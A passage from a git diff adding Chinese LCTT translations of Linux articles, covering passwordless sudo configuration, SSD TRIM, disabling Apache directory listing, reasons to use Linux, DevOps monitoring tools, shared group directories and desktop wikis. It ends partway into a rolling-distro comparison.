NOPASSWD: /bin/kill +``` + +下面的行会让 `sys` 组成员在使用 `sudo` 运行命令:`/bin/kill`、`/bin/rm` 时不用输入密码: + +``` +%sys ALL=(ALL) NOPASSWD: /bin/kill, /bin/rm +``` +[ + ![Run sudo Without Password](http://www.tecmint.com/wp-content/uploads/2017/01/Run-sudo-Without-Password.png) +][6] + +*不用密码运行 sudo* + +对于更多的 `sudo` 配置和其他使用选项,请阅读我们有更多例子描述的文章,: + +-  [在 Linux 中设置 sudo 的十条 sudoers 实用配置][1] +-  [让 sudo 在你输入错误的密码时“嘲讽”你][2] +-  [如何在 Linux 中让 sudo 密码会话的超时更长些][3] + +在本篇中,我们讨论了如何配置 sudo 命令来不用输入密码运行。不要忘记在评论栏中给我们提供你关于这份指导的想法和其他对于 Linux 系统管理员有用的 sudoers 配置。 + +-------------------------------------------------------------------------------- + +作者简介: + +Aaron Kili 是 Linux 和 F.O.S.S 爱好者,将来的 Linux SysAdmin 及 web 开发者,目前是 TecMint 的内容创作者,他喜欢用电脑工作,并坚信分享知识。 + +---------------------------------------------------------------- + + +via: http://www.tecmint.com/run-sudo-command-without-password-linux/ + +作者:[Aaron Kili][a] +译者:[geekpi](https://github.com/geekpi) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ +[1]:https://linux.cn/article-8145-1.html +[2]:https://linux.cn/article-8128-1.html +[3]:https://linux.cn/article-8151-1.html +[4]:http://www.tecmint.com/sudoers-configurations-for-setting-sudo-in-linux/ +[5]:http://www.tecmint.com/su-vs-sudo-and-how-to-configure-sudo-in-linux/ +[6]:http://www.tecmint.com/wp-content/uploads/2017/01/Run-sudo-Without-Password.png diff --git a/published/20170125 Solid state drives in Linux Enabling TRIM for SSDs.md b/published/20170125 Solid state drives in Linux Enabling TRIM for SSDs.md new file mode 100644 index 0000000000..794b36113c --- /dev/null +++ b/published/20170125 Solid state drives in Linux Enabling TRIM for SSDs.md @@ -0,0 +1,57 @@ +在 Linux 中使用 SSD(固态驱动器):启用 TRIM +============================================================ + + ![Solid state drives in Linux: Enabling TRIM for SSDs](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BUSINESS_robots.png?itok=6eqf2Wjv "Solid state drives in Linux: Enabling TRIM for SSDs") + +图片提供: opensource.com + +当我在运行 Linux 的计算机上安装我的第一块固态驱动器(SSD)后,我开始探索如何用好它们。SSD 在操作方式上与传统磁性驱动器不同,并且它们需要在软件上另行处理以达到功能优化。 + +在传统磁盘驱动器上,删除时所删除的文件不会从磁盘中完全删除。这就是为什么你可以恢复已删除的文件的原因。基本上,文件系统仅引用磁盘上文件的位置,并且当文件被删除时,该引用被擦除,以允许你在这些空间中写入新数据覆盖原来的数据。然而,对于 SSD,新数据只能写在驱动器上完全新的或已擦除的单元上。因为必须在写入之前清除空间,如果在写入文件时尚未有足够的可用空间,则必须首先擦除该空间。这可能会对性能产生负面影响。 + +如果操作系统在写入新数据之前就擦除了未使用的空间,而不是在写入时同时进行擦除,则可以提高文件保存性能。这种做法就是 [TRIM][1]。 TRIM 命令本质上允许你的操作系统告诉驱动器哪些区域的数据不再使用,以便擦除它们,加快驱动器将来的写入,可以 SSD 的用户提供更佳的体验。 + +在 Linux 中,`fstrim` 提供此功能,它可以为写入新数据而准备驱动器,并延长驱动器的使用寿命。由于在我使用的 Linux 发行版上 SSD 的 trim 不是自动的,所以必须去调度该操作,否则 SSD 的性能会随着时间的推移而降低。 + +为了在驱动器上运行 `fstrim`,驱动器本身以及其上的文件系统必须支持 TRIM。在文件系统挂载过程中可以启用 TRIM。例如,为了将设备 `/dev/sda2` 启用 TRIM 挂载到 `/mnt`,你要运行: + +``` +mount -t ext4 -o discard /dev/sda2 /mnt +``` + +一旦启用,TRIM 过程本身就相当简单。TRIM SSD 也可以在命令行或 cron 任务中手动完成。作为超级用户(使用 `su` 或 `sudo`),运行 `fstrim / -v` 以完成手动 trim,或者设置 cron 任务以在计算机未使用时定期为你运行此命令。对于 `fstrim` 的完整选项列表请参考它的 [man 手册][3]。 + +硬件支持根据使用的驱动器接口类型如 PCI、[ATA][4]、[SCSI][5] 还是 [SD/MMC][6] 而有所不同。你需要咨询你的 Linux 供应商以了解你的特定发行版是如何支持 TRIM 的。 + +例如,红帽提供以下 [SSD 磁盘指南][7]。“性能随着所使用的块数接近磁盘容量而降低,性能影响程度因供应商而异,但是所有设备都会遇到一些性能降低。为了解决性能降低问题,主机系统(例如 Linux 内核)使用丢弃请求以通知存储器给定范围的块不再使用。” + +[Debian wiki][8] 提供了 SSD 使用的一些基本注意事项:使用 Linux 3.2 或更高版本内核,使用 SSD 的最新固件,使用 EXT4 文件系统,并且“在正常工作负载下有足够的 DRAM 用来操作而不用使用交换空间“。 + +-------------------------------------------------------------------------------- + +作者简介: + +Don Watkins - 教育家、教育技术专家、企业家、开源倡导者。教育心理学硕士、教育领导硕士、Linux 系统管理员、CCNA、使用 Virtual Box 虚拟化。关注我 @Don_Watkins。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/solid-state-drives-linux-enabling-trim-ssds + +作者:[Don Watkins][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/don-watkins +[1]:https://en.wikipedia.org/wiki/Trim_(computing) +[2]:https://opensource.com/article/17/1/solid-state-drives-linux-enabling-trim-ssds?rate=7ZBblixmfl2icbl8HWXjIfzUr3-EUjlgkOGyEhI1DK8 +[3]:http://man7.org/linux/man-pages/man8/fstrim.8.html +[4]:https://en.wikipedia.org/wiki/Trim_(computing)#ATA +[5]:https://en.wikipedia.org/wiki/Trim_(computing)#SCSI +[6]:https://en.wikipedia.org/wiki/Trim_(computing)#SD.2FMMC +[7]:https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Storage_Administration_Guide/ch-ssd.html +[8]:https://wiki.debian.org/SSDOptimization +[9]:https://opensource.com/user/15542/feed +[10]:https://opensource.com/article/17/1/solid-state-drives-linux-enabling-trim-ssds#comments +[11]:https://opensource.com/users/don-watkins diff --git a/published/20170126 Disable Apache Web Directory Listing Using .htaccess File.md b/published/20170126 Disable Apache Web Directory Listing Using .htaccess File.md new file mode 100644 index 0000000000..ecae6ca7a9 --- /dev/null +++ b/published/20170126 Disable Apache Web Directory Listing Using .htaccess File.md @@ -0,0 +1,96 @@ +使用 .htaccess 文件禁用 Web 目录列举 +=========== + +[确保 Apache web 服务器安全][3] 是最重要的任务之一,特别是在你的网站刚刚搭建好的时侯。 + +比方说,如果你 Apache 服务目录 (`/var/www/tecmint` 或 `/var/www/html/tecmint`) 下创建一个名为 `tecmint` 的目录,并且忘记在该目录放置 `index.html`,你会惊奇的发现所有访问者都可以在浏览器输入 **http://www.example.com/tecmint** 来完整列举所有在该目录中的重要文件和文件夹。 + +本文将为你展示如何使用 `.htaccess` 文件禁用或阻止 Apache 服务器目录列举。 + +以下便是不存在 `index.html` ,且未采取防范措施前,目录的列举的情况。 + +[![Apache 目录列举](http://www.tecmint.com/wp-content/uploads/2017/01/Apache-Directory-Listing.png)][4] + +*Apache 目录列举* + +首先,`.htaccess`  (**hypertext access**) 是一个文件,它可以让站点管理员控制服务器的环境变量以及其他的重要选项,用以增强他/她的站点功能。 + +欲知更多关于该重要文件的信息,请阅读以下文章,以便通过 `.htaccess` 的方法来确保 Apache Web 服务器的安全。 + +1. [确保 Apache Web 服务器安全的 25 条 .htaccess 设置技巧][1] +2. [使用 .htaccess 为 Apache Web 目录进行密码保护][2] + +使用这一简单方法,在站点目录树中的任意/每个目录创建 `.htaccess` 文件,以便为站点根目录、子目录和其中的文件提供保护支持。 + +首先要 Apache 主配置文件中为你的站点启用 `.htaccess` 文件支持。 + +``` +$ sudo vi /etc/apache2/apache2.conf #Debian/Ubuntu 系统 +$ sudo vi /etc/httpd/conf/httpd.conf #RHEL/CentOS 系统 +``` +然后寻找以下部分,其中 `AllowOverride` 指令必须设置为 `AllowOverride All`。 + +``` + +Options Indexes FollowSymLinks +AllowOverride All + +``` +如果已存在 `.htaccess` 文件,先备份(如下),假设文件在 `/var/www/html/tecmint/` (并要禁用该目录列举): + +``` +$ sudo cp /var/www/html/tecmint/.htaccess /var/www/html/tecmint/.htaccess.orig +``` + +然后你就可以在某个特定的目录使用你喜欢的编辑器打开 (或创建) 它,以便修改。并添加以下内容来关闭目录列举。 + +``` +Options -Indexes +``` + +下一步就是重启 Apache Web 服务器: + +``` +-------- 使用 SystemD 的系统 -------- +$ sudo systemctl restart apache2 +$ sudo systemctl restart httpd +-------- 使用 SysVInit 的系统 -------- +$ sudo /etc/init.d/apache2 restart +$ sudo /etc/init.d/httpd restart +``` + +现在来验证效果,在浏览器中输入:**http://www.example.com/tecmint**,你会得到类似如下的信息: + +[![Apache 目录列举已禁用](http://www.tecmint.com/wp-content/uploads/2017/01/Apache-Directory-Listing-Disabled.png)][5] + +*Apache 目录列举已禁用* + +在本文中,我们描述了如何使用 `.htaccess` 文件来禁用 Apache Web 服务器的目录列举。之后我们会介绍两种同样简单的我方法来实现这一相同目的。随时保持联系。 + +像往常一样,在下方反馈表单中给我们发送关于本文的任何想法。 + +-------------- + +作者简介: + +Aaron Kili 是一名 Linux 和 F.O.S.S 忠实拥护者、未来的 Linux 系统管理员、Web 开发者,目前是 TecMint 的原创作者,热衷于计算机并乐于知识分享。 + +------------- + +译者简介: + +[GHLandy](http://GHLandy.com) - 生活中所有欢乐与苦闷都应藏在心中,有些事儿注定无人知晓,自己也无从说起。 + +------------- + +via: http://www.tecmint.com/disable-apache-directory-listing-htaccess/ + +作者:[Aaron Kili][a] +译者:[GHLandy](https://github.com/GHLandy) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProje) 原创编译,[Linux中国](https://linux.cn) 荣誉推出 + +[1]: http://www.tecmint.com/password-protect-apache-web-directories-using-htaccess/ +[2]: http://www.tecmint.com/apache-htaccess-tricks/ +[3]: http://www.tecmint.com/apache-security-tips/ diff --git a/published/20170130 5 Reasons To Install Linux Today.md b/published/20170130 5 Reasons To Install Linux Today.md new file mode 100644 index 0000000000..d2eda54a19 --- /dev/null +++ b/published/20170130 5 Reasons To Install Linux Today.md @@ -0,0 +1,109 @@ +当今需要安装 Linux 的五大理由 +=========================== + +如果你在阅读本文,那么你可能是一个 Linux 新手或者是 Linux 的潜在用户。又或者我猜的都不对,你只是好奇于我所说的当今需要安装 Linux 的五大理由。 + +不管如何,我都欢迎你来看看我做出的解释。如果说你能够读完全文,记得使用下边的评论功能分享你的想法。 + +**建议阅读:** [关于 GNU/Linux,我所喜恶的五件事][1] + +**声明**:以下列出的理由并非按照重要性顺序排列。也就是说,你可以从上到下或者以你愿意的顺序来进行阅读。 + +### 理由 1 – Linux 自由、免费 + +在 Linux 这个生态系统中,**“自由、免费 (free)”** 有两种含义:**1) 自由使用(Free as in freedom)** 以及 **2) 免费使用(Free as in beer)**。 + +第一个含义意味着,你可以自由使用 Linux 做你想要的任何事,比如个人使用或者商业用途。 + +第二个含义表明这样一个事实,多数 (**99%**) 的 Linux 发行版 (或者说,不同风格的 Linux) 都可以免费的下载和运行在大多数电脑上。 + +**建议阅读:** [2016 年最流行的 Linux 发行版][2] + +商业发行版经常应用到企业环境,以便获取其后公司的技术支持。红帽公司著名的 [红帽企业级 Linux][3] 就是这样一个例子。 + +[![Linux 自由、免费](http://www.tecmint.com/wp-content/uploads/2017/01/Linux-is-Free.png)][4] + +*Linux 自由、免费* + +### 理由 2 – Linux 可以使老旧设备起死回生 + +是的,你没看错。如果你有一部老旧电脑已经积满灰尘,因为它已经无法满足其他操作系统的硬件要求,那么 Linux 可以帮你拯救它。以我的经验来说,我第一台电脑 (2000 年末,我母亲给我的高中毕业礼物) 作为家庭服务器已经连续运行 5 年了 —— 一直在使用 Debian 最新的稳定版。 + +**建议阅读:** [老旧电脑和笔记本值得尝试的 6 个 Linux 发行版][5] + +[![Linux 支持老旧设备](http://www.tecmint.com/wp-content/uploads/2017/01/Linux-Supports-Old-Hardware.jpg)][6] + +*Linux 支持老旧设备* + +### 理由 3 – Linux 是学习计算机如何工作的最好工具 + +即使是新手,访问并与电脑硬件进行交互也是相对容易的。通过诸如 [dmesg][8] (从内核中列出相关信息)等 [命令行工具][7]加上一点耐心,你可以很容易了解从你按下电源开关到加载好一个完整可用的系统到底发生了哪些事情。当然,这只是其中一个例子。 + +[![学习 Linux](http://www.tecmint.com/wp-content/uploads/2017/01/Learn-Linux.jpg)][9] + +*学习 Linux* + +### 理由 4 – Linux 是学习编程的最好工具 + +我常常说,要是我早些认识 Linux 该多好。安装好系统之后,它就具备了开始学习 [Python 编程][10] 的必备工具。作为当今最流行的面向对象的编程语言之一,Python 在多所顶尖大学里都是计算机科学专业的主修课程。 + +[![学习 Linux 及 Python 编程](http://www.tecmint.com/wp-content/uploads/2017/01/Learn-Linux-with-Python-Programming.png)][11] + +*学习 Linux 及 Python 编程* + +### 理由 5 – 大量自由的世界一流软件 + +当然,我知道这与 **理由 1** 多少有些相似,但我还是决定将其列为一个独立的理由。为何?因为这为我们强调了这样一个事实,我们今天所使用的软件大多数是来自于大量志愿者的努力。 + +是的,写出这些优秀软件的人员从中不挣一分钱。在某些情况下,也有些公司为软件的开发和维护提供资金。 + +**建议阅读:** [2015 年我找到的 20 款自由开源的软件][12] + +Linux 系统是相当稳定的,所以他们都想要将他们的软件运行其中。这就是为什么很多公司愿意为 Linux 生态系统做出大量贡献的原因 (指捐赠或者提供人力)。 + +[![自由开源软件](http://www.tecmint.com/wp-content/uploads/2017/01/Free-Open-Source-Software.jpg)][13] + +*自由开源软件* + +### 总结 + +感谢你花费时间来阅读本文!关于我会第一时间建议他人使用的 Linux 的理由,我已经尽最大努力来阐述了。 + +如果你有不同于本文的意见,欢迎随时使用下方评论表单来分享您的观点。 + +------------------------------------ + +作者简介: + +Gabriel Cánepa - 一位来自阿根廷圣路易斯梅塞德斯镇 (Villa Mercedes, San Luis, Argentina) 的 GNU/Linux 系统管理员,Web 开发者。就职于一家世界领先级的消费品公司,乐于在每天的工作中能使用 FOSS 工具来提高生产力。 + +------------------------------------ + +译者简介: + +[GHLandy](http://GHLandy.com) —— 划不完粉腮柳眉泣别离。 + +------------------------------------ + +via: http://www.tecmint.com/install-linux-today/ + +作者:[Gabriel Cánepa][a] +译者:[GHLandy](https://github.com/GHLandy) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/install-linux-today/ +[1]:http://www.tecmint.com/things-i-dislike-and-love-about-gnu-linux/ +[2]:http://www.tecmint.com/top-best-linux-distributions-2016/ +[3]:http://www.tecmint.com/red-hat-rhcsa-rhce-exam-certification-book/ +[4]:http://www.tecmint.com/wp-content/uploads/2017/01/Linux-is-Free.png +[5]:http://www.tecmint.com/linux-distributions-for-old-computers/ +[6]:http://www.tecmint.com/wp-content/uploads/2017/01/Linux-Supports-Old-Hardware.jpg +[7]:http://www.tecmint.com/category/linux-commands/ +[8]:http://www.tecmint.com/dmesg-commands/ +[9]:http://www.tecmint.com/wp-content/uploads/2017/01/Learn-Linux.jpg +[10]:http://www.tecmint.com/category/python/ +[11]:http://www.tecmint.com/wp-content/uploads/2017/01/Learn-Linux-with-Python-Programming.png +[12]:http://www.tecmint.com/best-free-open-source-softwares-of-2015/ +[13]:http://www.tecmint.com/wp-content/uploads/2017/01/Free-Open-Source-Software.jpg diff --git a/published/20170131 5 DevOps Tools for Logging and Monitoring.md b/published/20170131 5 DevOps Tools for Logging and Monitoring.md new file mode 100644 index 0000000000..1a2932d17d --- /dev/null +++ b/published/20170131 5 DevOps Tools for Logging and Monitoring.md @@ -0,0 +1,88 @@ +5 个用于日志记录以及监控的 DevOps 工具 +============================================================ + + + ![DevOps tools](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/devops-logging.jpg?itok=8-1glKie "DevOps tools") + +> 这些 DevOps 日志记录和监控工具是重塑云计算趋势的一部分 -- 在《开放云指南》中了解更多。 + +[Creative Commons Zero][1] Pixabay + +在云中,开源工具和应用程序使 DevOps 提高了很多效率,对于日志记录和监视解决方案尤其如此。监控云平台、应用程序和组件以及处理和分析日志,对于确保高可用性、高性能、低延迟等至关重要。事实上,RightScale 最近的[云状态调查][4]报告中说,最常见的云优化的行为中,45% 的大公司和中小型企业关注的是监控。 + +然而,专有的记录和监控解决方案是昂贵的。更糟的是,它们通常捆绑更昂贵的管理服务产品。 + +现在进入强大的开放日志和监控解决方案的新浪潮。其中一些聚焦于有针对性的任务,例如容器集群的监控和性能分析,而其他作为整体监控和警报工具包,它们能够进行多维度的数据收集和查询。 + +Linux 基金会最近[发布][5]了[《开放云指南:当前趋势和开源项目》 Guide to the Open Cloud: Current Trends and Open Source Projects][6]这篇报告。这是第三份年度报告,全面地介绍了开放云计算的状态,包括为 DevOps 社区的日志记录和监控的部分。该报告现在已经可以[下载][7],它对研究进行了汇总和分析,阐述了容器、监控等的发展趋势在如何重塑云计算。该报告提供了对当今开放云环境很重要的分类项目的描述和链接。需要特别注意的是,DevOps 已经成为云中应用交付和维护的最有效方法。 + +在这里的[一系列帖子][8]中,我们按照类别从指南中列出了这些项目,并提供了该类别整体发展情况的见解。下面,你将看到一些用于记录和监视的重要 DevOps 工具集合,它们所带来的影响,以及它们的 GitHub 链接,这些都是从《[开放云指南][6]》中收集而来的: + +### 日志记录和监控 + +#### Fluentd + +Fluentd 是一个用于统一日志记录层的开源数据收集器,由 Treasure Data 贡献。它将数据结构化为 JSON,以统一处理日志数据的所有方面:在多个源和目标之间收集、过滤、缓冲和输出日志。 + +- [官网][9] +- [GitHub][10] + +#### Heapster + +Heapster 是 Kubernetes 的一个容器集群监控和性能分析工具。它本身支持 Kubernetes 和 CoreOS,并且经过调整可以在 OpenShift 上运行。它还支持可插拔的存储后端:使用 Grafana 的 InfluxDB、Google Cloud Monitoring、Google Cloud Logging、Hawkular、Riemann 和 Kafka。 + +- [官网][11] +- [GitHub][12] + +#### Logstash + +Logstash 是 Elastic 的开源数据管道,用于帮助处理来自各种系统的日志和其他事件数据。它的插件可以连接到各种源和大规模流数据到中央分析系统。 + +- [官网][13] +- [GitHub][14] + +#### Prometheus + +Prometheus 是一个开源的系统监控和警报工具包,最初由 SoundCloud 构建,现在是 Linux 基金会的云计算基础项目。它适用于以机器为中心和微服务架构,并支持多维度数据收集和查询。 + +- [官网][15] +- [GitHub][16] + +#### Weave Scope + +Weave Scope 是 Weaveworks 的开源工具,用于实时监控分布式应用程序及其容器。它与 Kubernetes 和 AWS ECS 集成。 + +- [官网][17] +- [GitHub][18] + +_要了解更多关于开源云计算的趋势,查看顶级开源云计算项目的完整列表。[现在下载 Linux 基金会的《开放云指南》报告!][3]_ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/news/open-cloud-report/2016/5-devops-tools-logging-and-monitoring + +作者:[SAM DEAN][a] +译者:[geekpi](https://github.com/geekpi) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/sam-dean +[1]:https://www.linux.com/licenses/category/creative-commons-zero +[2]:https://www.linux.com/files/images/devops-loggingjpg +[3]:http://bit.ly/2eHQOwy +[4]:http://www.rightscale.com/blog/cloud-industry-insights/cloud-computing-trends-2016-state-cloud-survey +[5]:https://www.linux.com/blog/linux-foundation-issues-2016-guide-open-source-cloud-projects +[6]:http://go.linuxfoundation.org/l/6342/2016-10-31/3krbjr?utm_source=press-release&utm_medium=pr&utm_campaign=open-cloud-report-2016 +[7]:http://go.linuxfoundation.org/l/6342/2016-10-31/3krbjr +[8]:https://www.linux.com/news/open-cloud-report/2016/guide-open-cloud-state-micro-oses +[9]:http://www.fluentd.org/ +[10]:https://github.com/fluent +[11]:http://blog.kubernetes.io/2015/05/resource-usage-monitoring-kubernetes.html +[12]:https://github.com/kubernetes/heapster +[13]:https://www.elastic.co/products/logstash +[14]:https://github.com/elastic/logstash +[15]:https://prometheus.io/ +[16]:https://github.com/prometheus +[17]:https://www.weave.works/products/weave-scope/ +[18]:https://github.com/weaveworks/scope diff --git a/published/20170201 How to Create a Shared Directory for All Users in Linux.md b/published/20170201 How to Create a Shared Directory for All Users in Linux.md new file mode 100644 index 0000000000..8d2ec222fa --- /dev/null +++ b/published/20170201 How to Create a Shared Directory for All Users in Linux.md @@ -0,0 +1,87 @@ +如何在 Linux 中创建一个共享目录 +============================================================ + +作为系统管理员,你可能有一个特定目录,你希望为 Linux 服务器上的每个用户授予读/写访问权限。在本指南中,我们将回顾如何在 Linux 中对特定目录(共享目录)上的所有用户启用写访问。 + +这要求设置适当的访问权限,而最有效、可靠的方法是为所有要共享或对特定目录的写访问权的用户分配一个公共组。 + +如果你系统中还没有存在这个目录和公众组,用下面的命令创建: + +``` +$ sudo mkdir -p /var/www/reports/ +$ sudo groupadd project +``` + +接着将对目录 `/var/www/reports/` 有写权限的用户添加到 `project` 组中。 + +``` +$ sudo usermod -a -G project tecmint +``` +[ + ![Create Common Directory Group](http://www.tecmint.com/wp-content/uploads/2017/01/Create-Common-Directory-Group.png) +][1] + +*创建公共目录组* + +上面命令使用到的标志和参数是: + +1. `-a` – 将用户添加到增补组中。 +2. `-G` – 指定组名。 +3. `project` – 组名。 +4. `tecmint` – 已有的用户名。 + +在这之后,给目录配置适当的权限,`-R` 会让操作递归进入子目录中:  + +``` +$ sudo chgrp -R project /var/www/reports/ +$ sudo chmod -R 2775 /var/www/reports/ +``` + +解释下上面 `chmod` 命令中的 `2775`: + +1. `2` - 打开 setGID 位,意味着新创建的子文件继承与目录相同的组,新创建的子目录继承父目录的 setGID 位。 +2. `7` - 为所有者提供 rwx 权限。 +3. `7` - 给组 rwx 权限。 +4. `5` - 为其他人提供 rx 权限。 + +你可以使用下面的命令创建更多的系统用户并将它们添加到目录组中: + +``` +$ sudo useradd -m -c "Aaron Kili" -s/bin/bash -G project aaronkilik +$ sudo useradd -m -c "John Doo" -s/bin/bash -G project john +$ sudo useradd -m -c "Ravi Saive" -s/bin/bash -G project ravi +``` + +接着创建每个用户存储他们项目报告的子目录: + +``` +$ sudo mkdir -p /var/www/reports/aaronkilik_reports +$ sudo mkdir -p /var/www/reports/johndoo_reports +$ sudo mkdir -p /var/www/reports/ravi_reports +``` + +现在你可以创建文件/文件,并分享给该组的其他用户了。 + +就是这样了!在本篇中,我们回顾了如何启用所有用户对特定目录的写权限。要了解更多关于 Linux 中的用户/组,阅读[如何管理用户/组和属性][2]。 + +记得在评论栏中留下你对这篇文章的想法。 + +-------------------------------------------------------------------------------- + +译者简介: + +Aaron Kili 是 Linux 和 F.O.S.S 爱好者,将来的 Linux SysAdmin 和 web 开发人员,目前是 TecMint 的内容创建者,他喜欢用电脑工作,并坚信分享知识。 + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/create-a-shared-directory-in-linux/ + +作者:[Aaron Kili][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ +[1]:http://www.tecmint.com/wp-content/uploads/2017/01/Create-Common-Directory-Group.png +[2]:http://www.tecmint.com/manage-users-and-groups-in-linux/ diff --git a/published/20170202 3 desktop wikis to help organize information.md b/published/20170202 3 desktop wikis to help organize information.md new file mode 100644 index 0000000000..39d123e75b --- /dev/null +++ b/published/20170202 3 desktop wikis to help organize information.md @@ -0,0 +1,85 @@ +3 个帮助你整理信息的桌面 Wiki +============================================================ + + ![3 desktop wikis to help organize information](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/resume_career_document_general.png?itok=7Am9KpC- "3 desktop wikis to help organize information") +图片提供: opensource.com + +当你想到 “wiki” 这个词时,可能会想到 MediaWiki 或 DokuWiki 这样的例子。它们开源、好用、强大而且灵活。它们可以自己用、也可以团队协作使用或者只是帮忙整理生活中的海量信息。 + +另一方面,那些 wiki 也有点大。运行它们稍微需要一些额外的计算机技能。对我们中的许多人来说,这有些困难,特别是如果你只想在自己的桌面上使用 wiki。 + +如果你想在桌面上感受 wiki,而不用做那些复杂的工作,这很容易做到。这有一些轻量级 wiki,可以帮助你组织你的信息、跟踪你的任务、管理你的笔记等等。 + +让我们来看看其中三个轻量级的桌面 wiki。 + +### Zim Desktop Wiki + +[Zim Desktop Wiki][2](简称 Zim)相对较小、相当快,而且易于使用。它围绕“笔记本”的概念构建,“笔记本”是一个单一主题或一组 wiki 页面的集合。 + +每个笔记本都可以包含任意数量的页面,你可以使用 [CamelCase][3](wiki 用户的最爱)或使用工具栏上的选项在这些页面之间链接。你可以通过单击工具栏上的按钮来使用 Zim 的 wiki 标记对页面进行格式化。 + +Zim 可以将你的网页导出为多种格式,包括 HTML、LaTeX、ReStructuredText 和 Markdown。你还可以利用 Zim 的[众多插件][4]来为应用程序添加拼写检查,方程编辑器,表格编辑器等。 + +![Zim Desktop Wiki](https://opensource.com/sites/default/files/zim.png "Zim Desktop Wiki") + +*Zim Desktop Wiki* + +### TiddlyWiki + +[TiddlyWiki][5] 不是一个软件,它是一个大的 HTML 文件。大小大概有 2MB,TiddlyWiki 是最灵活的选择之一。你可以将文件存储在计算机上、网络驱动器上,或随身携带在闪存上。 但是不要被 TiddlyWiki 表面上的简单所迷惑,它是一个非常强大的工具。 + +想要使用 TiddlyWiki,你要创建叫一种 “tiddlers” 的东西。 tiddlers 是你的 wiki 上的项目,如笔记、日记、书签和任务列表。tiddlers 也可以是你想要的任何东西。当使用 tiddlers 时,你可以添加 TiddlyWiki 版的 WikiText 和图片。 TiddlyWiki 甚至包装了一个原始的绘画程序。 + +如果这还不够,TiddlyWiki 有一个内置的插件集,它允许你更改 tiddlers 的编辑器,添加工具来实现从印象笔记导入数据、做数学排版、Markdown 渲染等等。 + +![TiddlyWiki](https://opensource.com/sites/default/files/tiddlywiki.png "TiddlyWiki") + +*TiddlyWiki* + +### WikidPad + +虽然不够漂亮,但古老的 [WikiPad][6] 可以很好地完成工作。 + +当你想要围绕某个主题创建一组笔记(例如你撰写的文章的信息或项目计划)时,你可以创建一个新的 wiki 页面。接着,你可以添加子页面并通过使用 [CamelCase][7] 命名这些子页面将它们链接在一起。你可以创建任意数量的 wiki 页面,并且根据需要打开(在单独的窗口中)。 + +此外,你可以使用 WikiText 添加基本格式,也可以将图像粘贴到 wiki 页面中。当你想要共享你的 wiki 页面时,你可以在线发布或打印它们 - WikidPad 有一个非常好的 HTML 导出功能。 + +WikidPad 只有 Windows 安装程序或源代码发布的形式。它没有流行的发行版的软件包。但是,你不必编译就可以在 Linux 中使用它。WikidPad wiki 有从命令行启动软件的[简单而细致的说明][8]。 + +![WikidPad](https://opensource.com/sites/default/files/wikidpad.png "WikidPad") + +*WikidPad* + +**你有最喜欢的可以帮你组织信息的轻量级桌面 wiki 么?请在下方的留言中与我们共享。** + +-------------------------------------------------------------------------------- + +译者简介: + +Scott Nesbitt - 作家、编辑、江湖客(Soldier of fortune)、豹猫牧马人(Ocelot wrangler)、丈夫和父亲、博客主、陶器收藏家。Scott 是以上的混合体。他也是一个自由/开源软件的长期用户,他为此写了很多[博客][12]。你可以在 [Twitter][13]、[GitHub][14] 找到他。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/2/3-desktop-wikis + +作者:[Scott Nesbitt][a] +译者:[geekpi](https://github.com/geekpi) +校对:[Bestony](https://github.com/Bestony) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/scottnesbitt +[1]:https://opensource.com/article/17/2/3-desktop-wikis?rate=2SqxwFsI7ttHe6AWH_Wyq4I6WT8NdBSuZ_4zUOLO9RA +[2]:http://zim-wiki.org/index.html +[3]:https://en.wikipedia.org/wiki/Camel_case#Wiki_link_markup +[4]:http://zim-wiki.org/manual/Plugins.html +[5]:http://tiddlywiki.com/ +[6]:http://wikidpad.sourceforge.net/ +[7]:https://en.wikipedia.org/wiki/Camel_case#Wiki_link_markup +[8]:http://trac.wikidpad2.webfactional.com/wiki/InstallLinux +[9]:https://opensource.com/user/14925/feed +[10]:https://opensource.com/article/17/2/3-desktop-wikis#comments +[11]:https://opensource.com/users/scottnesbitt +[12]:http://scottnesbitt.io/ +[13]:http://www.twitter.com/ScottWNesbitt +[14]:https://github.com/ScottWNesbitt diff --git a/published/20170205 Arch Linux vs. Solus vs. openSUSE Tumbleweed: Your Favorite Rolling Distro Is.md b/published/20170205 Arch Linux vs. Solus vs. openSUSE Tumbleweed: Your Favorite Rolling Distro Is.md new file mode 100644 index 0000000000..007739ecc9 --- /dev/null +++ b/published/20170205 Arch Linux vs. Solus vs. openSUSE Tumbleweed: Your Favorite Rolling Distro Is.md @@ -0,0 +1,47 @@ +Arch Linux、Solus 和 openSUSE Tumbleweed:谁是你最喜欢的滚动发行版? +============================================================ + +> 告诉我们你 PC 上使用的滚动 Linux 系统 + +我最近不得不重新安装我的笔记本,由于在我的笔记本上我只使用 Linux,我不能花半天定制操作系统、安装数百个更新,然后设置我最喜欢的应用程序。 + +我通常使用 [Arch 